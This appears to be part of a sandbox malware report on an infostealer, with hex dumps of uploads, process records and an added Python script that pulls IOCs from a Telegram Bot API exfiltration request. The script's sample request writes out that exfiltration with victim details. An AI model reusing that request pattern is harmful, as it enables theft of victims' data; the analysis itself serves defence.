                            2024-07-29 05:38:56 UTC16384OUTData Raw: c6 93 3f e9 c5 78 38 cf 74 cf 5f f2 6a 5f f4 44 fe 70 e3 18 6c 1c 07 e0 03 df ea 55 f9 96 fc 75 f4 5d 67 e1 f4 83 e0 f4 2d 00 70 ee 36 78 d0 cd f8 3d 6f e6 7e 4f f9 c5 1f e3 91 bf 9c 00 98 5b f8 c5 af 7d 15 de 84 67 fb a5 6f ff 16 de ec 6f 8e c1 c6 31 00 7c 04 5f fd 69 6f c2 47 5d c7 15 f7 fc 25 af f6 b1 bf ce 8b 7f d4 27 f2 09 e7 7f 8c 47 fe ce 16 9c 7e 10 00 be e9 24 7e f4 df a3 cf 3e cf 2f fe cc 4b f0 d3 ef ff 7b 7c eb 62 07 80 57 7d 8b 37 e3 0f de 70 87 67 f9 9b 3f 40 3f 70 09 96 97 80 5b f8 c5 af bb 9e 9f 7e bf 5f e5 db 0c e6 e1 fc e2 77 be 1c 4f fa ac 1f e1 63 96 b7 c0 a9 07 c1 a9 9b 79 be 96 7b 70 ee 36 fc 90 9b f1 7b df 0c 00 3c 89 0f 7a 97 9f e2 5b 8f 1e cc 2f fe cc 3b f1 26 3c db 53 7e e5 17 79 c4 8f f4 fc e2 77 be 3e 6f c2 fd ce f3 35 9f f5 63
                            Data Ascii: ?x8t_j_DplUu]g-p6x=o~O[}goo1|_ioG]%'G~$~>/K{|bW}7pg?@?p[~_wOcy{p6{<z[/;&<S~yw>o5c
                            2024-07-29 05:38:56 UTC16384OUTData Raw: 64 26 00 11 81 6d 6c 13 11 00 c8 3c 0f db 48 22 33 b1 8d 24 24 01 60 1b 80 d6 1a 11 41 44 20 89 cc c4 36 f7 b3 85 24 22 02 00 db d8 46 12 92 08 27 99 09 80 24 00 6c 03 10 11 d8 c6 36 00 92 00 b0 0d 80 24 1e 28 33 b1 0d 40 44 20 89 d6 1a 00 92 78 7e 6c 53 4a 41 86 d6 1a 00 11 01 40 6b 8d 88 4a 66 02 50 6b 45 12 ad 35 6c 13 11 b4 d6 90 04 80 6d 00 22 02 80 cc c4 36 11 41 44 60 1b db 00 d8 26 33 a9 0a ee 27 09 00 49 dc 6f 9a 26 22 82 52 0a 00 d3 34 31 4d 13 a5 14 ba ae 63 9a 26 24 21 09 db 00 48 42 12 00 99 c9 03 d9 46 12 00 92 88 08 32 13 db 00 48 22 33 b1 0d 40 44 20 09 db d8 c6 36 92 88 08 24 81 4d 66 02 50 4a c1 36 d3 34 01 50 4a c1 6e d8 06 20 22 00 b0 0d 40 44 30 8e 23 92 88 08 22 02 49 d8 26 33 c9 4c 22 2a b6 79 7e 6c 23 09 00 49 3c 37 49 90 c6 36 00
                            Data Ascii: d&ml<H"3$$`AD 6$"F'$l6$(3@D x~lSJA@kJfPkE5lm"6AD`&3'Io&"R41Mc&$!HBF2H"3@D 6$MfPJ64PJn "@D0#"I&3L"*y~l#I<7I6
                            2024-07-29 05:38:56 UTC16384OUTData Raw: 71 3f db 88 1f 58 9a ff 4c 36 ff 1e 32 ff ad 6c f3 c2 c8 fc bb 58 fc 9b 48 02 40 12 b6 01 b0 0d 36 48 fc 47 91 c4 0b 17 bc 30 b6 01 90 c4 fd 6c 03 80 0d 11 60 f3 02 49 bc 30 41 01 40 12 92 00 90 84 24 00 32 13 db d8 c6 36 b6 c1 e6 d9 92 07 92 79 0e b2 79 7e 64 ae 08 63 9b 07 b2 cd 73 93 79 be 2c fe c3 d9 e6 7e 32 ff a1 6c f3 40 92 b8 9f 6d fe b5 82 e7 64 9b ff 4e b6 f9 d7 90 f9 0f 65 9b 7f 0d 99 17 99 6d 9e 83 0d 12 ff 1e 61 5e 28 db bc 30 b6 79 61 42 e2 7e b6 f9 af 66 9b 17 26 1c fc 7b d8 06 40 12 0f 64 9b 17 85 cc 73 b0 cd 8b ca 36 92 78 61 e4 00 c0 36 ff 51 6c 73 bf 30 ff 2a b6 f9 b7 90 79 be 6c f3 c2 c8 e6 3f 9a 6d 5e 54 32 2f 12 db fc 5b c8 bc 50 99 c9 0b 13 fc cb 6c 73 3f 49 dc cf 36 92 78 20 db 3c 90 cc bf 9a 6d c2 3c 0f db fc 6b c9 5c 66 1b 49 3c
                            Data Ascii: q?XL62lXH@6HG0l`I0A@$26yy~dcsy,~2l@mdNema^(0yaB~f&{@ds6xa6Qls0*yl?m^T2/[Pls?I6x <m<k\fI<
                            2024-07-29 05:38:56 UTC16384OUTData Raw: 92 b8 5f 18 6c 03 60 1b db d8 a6 ef 7b 32 93 d6 1a b6 89 08 24 01 90 99 48 22 33 89 08 4a 29 00 4c d3 84 6d 4a 29 b4 d6 88 08 00 32 13 80 88 40 12 b6 69 ad 11 11 44 04 00 b6 b1 8d 24 24 81 4d 44 60 9b d6 1a b6 89 08 00 6c 23 09 49 dc cf 36 b6 b9 9f 6d 24 01 20 09 49 00 48 02 40 12 ad 35 5a 6b 00 94 52 88 08 ee e7 96 64 26 92 a8 b5 02 30 4d 13 b6 89 08 86 f5 9a ae ef a9 b5 92 99 4c d3 04 40 df f7 d4 5a 59 2e 97 48 e2 81 6c 13 11 44 04 b6 b1 8d 6d 24 11 11 00 64 26 ad 35 4a 29 dc cf 36 b6 01 90 84 24 6c d3 5a c3 36 b5 56 00 32 13 80 88 20 33 b1 4d 44 10 11 d8 a6 b5 06 80 24 94 46 12 92 b0 8d 6d 00 24 11 11 d8 46 12 b6 99 a6 09 49 d4 5a b1 cd 34 4d 74 5d 47 6b 0d db 94 52 90 84 6d 9e 09 e9 07 57 06 b0 cd 03 49 02 c0 36 2f 12 1b 30 64 82 13 9c fc 47 08 73 99
                            Data Ascii: _l`{2$H"3J)LmJ)2@iD$$MD`l#I6m$ IH@5ZkRd&0ML@ZY.HlDm$d&5J)6$lZ6V2 3MD$Fm$FIZ4Mt]GkRmWI6/0dGs
                            2024-07-29 05:38:56 UTC16384OUTData Raw: 06 c4 c1 fe 1e 6a 17 d9 d8 b9 11 10 0f 74 f6 ec 59 e6 f3 39 ad 35 9e bc ac bc c2 f5 5b 3c d0 1f dc b1 cf 1b fc f1 16 ff ed d2 3c b7 6b 7f e5 8f f9 cf 70 db 77 bf 06 ff 1e 9f f5 19 9f ca 17 3f f6 73 f8 d7 b0 cd 7f 87 ef f4 8f f1 9e ef f9 9e b4 d6 b8 df ec 33 9f ca fa 73 1f 0e 36 cf 41 c6 16 00 c2 d8 80 84 6d 24 ae 30 97 99 e7 b4 f8 ec a7 b1 fc ac 87 60 ae e8 6a e5 6b bf ee eb f8 f8 13 1f 04 80 c5 f3 27 9e a9 f0 a2 88 08 24 21 89 07 2a 01 b6 71 4b 6c 93 99 d8 c6 36 d8 90 c9 b3 48 3c 8f 34 cf 29 c1 e6 7e 25 82 2b 12 db 00 48 e2 7e b6 78 61 6c f3 9f 49 e6 85 b2 cd bf 87 6d 5e 98 40 00 d8 e6 81 6c 03 20 89 17 c6 16 ff 1e 61 fe d5 6c f3 1f 4d 12 b6 b1 cd 03 c9 fc bb d8 e6 85 09 5e 38 db fc 5b c8 3c 07 db fc 47 b0 cd 03 c9 fc a7 b2 0d 40 98 67 b1 cd 7f 14 f1 c2
                            Data Ascii: jtY95[<<kpw?s3s6Am$0`jk'$!*qKl6H<4)~%+H~xalIm^@l alM^8[<G@g
                            2024-07-29 05:38:56 UTC16384OUTData Raw: 4a 20 f9 97 c8 bc 00 c1 03 d9 e6 bf 92 1c 3c 37 db fc 5b d8 e6 39 d8 20 f1 c2 84 79 a1 6c f3 ef 61 9b 17 46 e6 df c5 36 ff 26 36 00 e2 df 29 cd 7f 17 db c8 fc bb 58 3c 07 99 e7 20 89 07 0a f3 1c 6c 63 9b 17 95 6d fe 2d c4 bf 8d 6d 5e 98 70 f0 a2 b2 cd 73 93 b9 cc 36 ff 11 6c f3 af 21 f3 3c 6c f3 dc 82 e7 cf 36 2f 0a 99 17 89 6d 5e 14 b6 01 08 f3 af 62 9b 7f 0d 49 3c 37 db 3c 4b 9a 17 85 78 36 db bc 30 92 b8 9f 6d 1e c8 36 0f a4 34 cf 8f cc 65 92 b0 8d 6d 00 24 01 10 5c 61 89 cc 04 40 12 b6 b1 0d 80 24 6c 03 10 bc 60 b6 b9 9f 24 ee 67 1b db 44 04 00 99 89 6d 22 02 80 cc 24 92 e7 20 89 07 8a 08 32 13 00 49 00 64 26 b6 89 08 32 13 49 dc 2f cc 65 b6 b1 8d 24 00 6c 03 10 12 f7 b3 4d 29 85 fb d9 06 c0 36 0f 64 1b 00 db 48 42 12 92 00 f0 d4 b0 8d 6d 24 11 11 00
                            Data Ascii: J <7[9 ylaF6&6)X< lcm-m^ps6l!<l6/m^bI<7<Kx60m64em$\a@$l`$gDm"$ 2Id&2I/e$lM)6dHBm$
2024-07-29 05:38:58 UTC | 389 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Mon, 29 Jul 2024 05:38:58 GMT
                            Content-Type: application/json
                            Content-Length: 1261
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
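The session above is the exfiltration step: a single `sendDocument` call to the Telegram Bot API whose URL path carries the bot token, whose `caption` query parameter carries the victim profile as newline-separated `Key: value` lines, and whose multipart body uploads a zip named after the victim's country and public IP. Because the token sits in the path, every proxy or sandbox log of this request contains a working C2 credential. The following is an added example, not part of the Joe Sandbox report or of the sample's own code: it takes a captured request in this shape, extracts the IOCs an analyst would file (bot id, chat_id, upload filename, which log categories were marked collected), redacts the token, and flags the missing User-Agent header that the report's signature list also notes. The sample request is constructed to mirror the captured one; the bot token, chat_id and multipart boundary are placeholders, and the 35-character token length in the regex is taken from the shape of the token captured here.

```python
"""Extract IOCs from a captured Telegram Bot API upload (stealer exfil)."""
import re
from urllib.parse import urlsplit, parse_qs

# Bot API paths look like /bot<numeric id>:<35-char secret>/<method>.
BOT_PATH_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]{35})/([A-Za-z]+)$")
FILENAME_RE = re.compile(r'filename="([^"]*)"')

# Constructed sample modelled on the POST in this report. Token, chat_id and
# boundary are placeholders; the caption keeps a subset of the captured fields.
SAMPLE_REQUEST = (
    "POST /bot1234567890:AAExampleTokenValueForDemoOnly-xxxx/sendDocument"
    "?chat_id=1000000001&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.33"
    "%0ACountry:%20United%20States%0ATimezone:%20-04:00%0A%0A-%20PC%20Info%20-"
    "%0A%0AUsername:%20user%0AHWID:%205205123305035030%0AIs%20Elevated:%20true"
    "%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender"
    "%0A%0A-%20Log%20Info%20-%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202"
    "%0AFiles:%20%E2%9C%85%2030 HTTP/1.1\r\n"
    "content-type: multipart/form-data; boundary=deadbeef\r\n"
    "content-length: 938035\r\n"
    "accept: */*\r\n"
    "host: api.telegram.org\r\n"
    "\r\n"
    "--deadbeef\r\n"
    'Content-Disposition: form-data; name="document"; filename="[US]_8.46.123.33.zip"\r\n'
    "Content-Type: application/zip\r\n"
    "\r\n"
    "PK\x03\x04<zip bytes elided>"
)


def split_request(raw):
    """Split a raw HTTP/1.1 request into (request line, lowercase headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_caption(caption):
    """Turn the newline-separated 'Key: value' caption into a dict.

    Section markers such as '- IP Info -' are skipped; indented '- item'
    lines are attached as a list to the preceding key (e.g. Antivirus)."""
    fields = {}
    last_key = None
    for line in caption.split("\n"):
        stripped = line.strip()
        if not stripped or (stripped.startswith("-") and stripped.endswith("-")):
            continue
        if stripped.startswith("- ") and last_key is not None:
            prev = fields[last_key]
            fields[last_key] = (prev if isinstance(prev, list) else [prev]) + [stripped[2:]]
            continue
        key, sep, value = stripped.partition(":")
        if not sep:
            continue
        last_key = key.strip()
        fields[last_key] = value.strip() or []
    return fields


def analyse(raw):
    """Return IOCs and findings for a Telegram Bot API request, else None."""
    request_line, headers, body = split_request(raw)
    method, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    match = BOT_PATH_RE.match(url.path)
    if headers.get("host") != "api.telegram.org" or not match:
        return None
    bot_id, secret, api_method = match.groups()
    query = parse_qs(url.query, keep_blank_values=True)
    caption = parse_caption(query.get("caption", [""])[0])
    upload = FILENAME_RE.search(body)
    findings = [f"{method} to Telegram Bot API method {api_method}"]
    if "user-agent" not in headers:
        findings.append("no User-Agent header")
    if upload:
        findings.append(f"uploads document {upload.group(1)}")
    # Categories the stealer marked with a check mark were actually collected.
    collected = [k for k, v in caption.items()
                 if isinstance(v, str) and v.startswith("\u2705")]
    return {
        "bot_id": bot_id,
        # Keep only the edges of the secret so the IOC can go into a ticket
        # without republishing a working token.
        "redacted_token": f"{bot_id}:{secret[:4]}...{secret[-4:]}",
        "api_method": api_method,
        "chat_id": query.get("chat_id", [""])[0],
        "caption": caption,
        "collected": collected,
        "document_filename": upload.group(1) if upload else None,
        "findings": findings,
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_REQUEST).items():
        print(f"{key}: {value}")
```

When filing the real IOCs from this report, report the bot id and chat_id and revoke-request the token through Telegram rather than pasting the full token into shared tooling; the `redacted_token` field exists for exactly that reason.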


Target ID: 0
Start time: 01:37:59
Start date: 29/07/2024
Path: C:\Users\user\Desktop\765iYbgWn9.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\765iYbgWn9.exe"
Imagebase: 0x7ff62f040000
File size: 5'438'976 bytes
MD5 hash: 0534AB10184891CD61D262BFD79B7B4C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 5
Start time: 01:38:36
Start date: 29/07/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 01:38:36
Start date: 29/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                            No disassembly